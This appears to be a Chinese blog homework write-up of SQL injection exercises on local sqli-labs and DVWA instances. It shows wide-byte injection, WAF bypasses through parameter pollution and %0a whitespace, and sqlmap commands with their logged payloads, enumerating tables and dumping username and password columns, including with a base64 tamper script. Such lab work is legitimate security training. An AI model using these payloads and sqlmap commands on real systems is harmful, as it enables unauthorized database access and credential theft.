宽字节注入

第三十二关

当我们输入注入语句时：http://localhost/sqli-labs-master/Less-32/?id=1'

发现单引号被反斜杠给转译了，这样单引号就失去的闭合sql语句的用处了，所以我们要用%df来干掉反斜杠。

原因是urlencode(\') = %5c%27，我们在%5c%27前面添加%df，这样%df%5c就变成了運' 这样%27也就是单引号就单独的出来了

http://localhost/sqli-labs-master/Less-32/?id=1%df%27%20%20and%201=1%20--%20

waf绕过

第三十一关

当我们输入：localhost/sqli-labs-master/Less-31/login.php?id=1"

时页面会返回给我们被攻击的样式，说明"是有waf防御的，那么我们尝试参数污染来让过这个waf

给ID一个他没有的值比如一个很大的值http://localhost/sqli-labs-master/Less-31/login.php?id=11111111

计划通，没有返回给我们被攻击的页面，之后我们再在后面写入具有攻击性的参数覆盖掉前面的id值

http://localhost/sqli-labs-master/Less-31/login.php?id=11111111&id=1%22)%20and%201=1%20--%20-

这样就成功的绕过了这个waf了

二十八关

当我们尝试注入时：http://localhost/sqli-labs-master/Less-28/?id=1%27)%20and%201=1%20--%20-

发现页面返回的没有空格和杠这些符号，说明被waf删除了，我们需要代替这些符号，空格可以用%0a，后面的注释可以这样写and '1' = '1

http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aand%0A1=1%0Aand%0A(%271%27)=(%271

这样我们就可以修改第一个1=1来进行注入了

输入union select 1,2,3发现union和select也被waf了

http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aand%0Aunion%0Aselect%0A1,2,3%0Aand%0A(%271%27)=(%271

但是我们在union和select之间增加随意的字母waf就不会防御。

这样我们就可以这样写来绕过

http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aunion%0Aall%0Aselect%0A1,2,3%0Aand%0A(%271%27)=(%271

SQLmap的使用

第一关

在cmd中输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

注意需要在SQLmap的目录下使用

结果：

___
__H__
___ ___[.]_____ ___ ___ {1.3.7.15#dev}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:32:36 /2020-02-11/

[19:32:38] [INFO] testing connection to the target URL
[19:32:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:32:40] [INFO] testing if the target URL content is stable
[19:32:41] [INFO] target URL content is stable
[19:32:41] [INFO] testing if GET parameter 'id' is dynamic
[19:32:42] [INFO] GET parameter 'id' appears to be dynamic
[19:32:43] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:32:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:32:44] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:32:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:32:59] [WARNING] reflective value(s) found and filtering out
[19:33:03] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:33:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:33:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:33:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:33:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:33:07] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:33:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:33:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:33:10] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:33:10] [INFO] testing 'MySQL inline queries'
[19:33:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:33:11] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[19:33:20] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:33:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:36:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:36:03] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[19:36:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:36:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:36:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:36:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:36:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:36:27] [INFO] target URL appears to have 3 columns in query
[19:36:35] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8415=8415 AND 'iMVG'='iMVG

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4779 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(4779=4779,1))),0x7170717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uAVp'='uAVp

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6954 FROM (SELECT(SLEEP(5)))BnDL) AND 'sgEP'='sgEP

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6695' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x676b79505365574c6368536a457368766a735366766c6f59626b7667415574455351424c444a4d51,0x7170717a71)-- zdhe
---
[19:36:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[19:36:36] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[19:36:36] [WARNING] you haven't updated sqlmap for more than 215 days!!!

[*] ending @ 19:36:36 /2020-02-11/

列出当前数据库(参数current-db)：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db

结果：
[19:43:21] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[19:43:21] [INFO] fetching current database
current database: 'security'
[19:43:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[19:43:22] [WARNING] you haven't updated sqlmap for more than 215 days!!!

列出security这个数据库所有的表：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables

结果：

[19:57:00] [INFO] fetching tables for database: 'security'
[19:57:01] [INFO] used SQL query returns 4 entries
[19:57:02] [INFO] retrieved: 'emails'
[19:57:03] [INFO] retrieved: 'referers'
[19:57:04] [INFO] retrieved: 'uagents'
[19:57:05] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+

查看这个users表列出当前字段：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --columns

结果：

[19:58:21] [INFO] fetching columns for table 'users' in database 'security'
[19:58:22] [INFO] used SQL query returns 3 entries
[19:58:23] [INFO] retrieved: 'id','int(3)'
[19:58:24] [INFO] retrieved: 'username','varchar(20)'
[19:58:25] [INFO] retrieved: 'password','varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

查看username和password：python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users -C username,password --dump

结果：

用DVWA进行检测

级别选择low进入到sql注入选项里

按照之前的步骤指定网址但是DVWA不能直接把网址放入到sqlmap中需要指定cookie

通过bp抓包找到cookie

python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=fumpna387v7b35fhcpo4u5vid4"

结果：

___
__H__
___ ___[']_____ ___ ___ {1.3.7.15#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[*] starting @ 20:16:25 /2020-02-11/

[20:16:26] [INFO] resuming back-end DBMS 'mysql'
[20:16:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 4771=4771#&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9013 FROM(SELECT COUNT(*),CONCAT(0x716b6a6271,(SELECT (ELT(9013=9013,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XRCb&Submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6809 FROM (SELECT(SLEEP(5)))APvg)-- Sgqb&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716b6a6271,0x6154574d745946724c6b635871695750557553626a487647486f4c636e474f6b497470734b4e5a51,0x7178627a71),NULL#&Submit=Submit
---
[20:16:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[20:16:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[20:16:26] [WARNING] you haven't updated sqlmap for more than 216 days!!!

[*] ending @ 20:16:26 /2020-02-11/

列出当前数据库：python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=fumpna387v7b35fhcpo4u5vid4" --current-db

20:20:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[20:20:12] [INFO] fetching current database
current database: 'dvwa'
[20:20:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[20:20:12] [WARNING] you haven't updated sqlmap for more than 216 days!!!

其他操作步骤与上面相同

sqlmap绕过waf

第二十一关

进行检测（用cookie）：python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "PHPSESSID=fumpna387v7b35fhcpo4u5vid4"

发现没有注入点，这时我们需要尝试脚本来绕过，（这里用base64编码脚本）

直接测试当前数据库：python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql --current-db

---
[20:51:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:51:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[20:51:54] [INFO] fetching current database
current database: 'security'
[20:51:55] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[20:51:55] [WARNING] you haven't updated sqlmap for more than 216 days!!!

测试表：python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql -D security --tables

测试列：python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql -D security -T users --columns

查看数据：python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql -D security -T users -C username,password --dump

he1721360028

发布了17 篇原创文章 · 获赞 2 · 访问量 772

私信关注

20200211作业

宽字节注入

waf绕过

SQLmap的使用

第一关

用DVWA进行检测

sqlmap绕过waf

猜你喜欢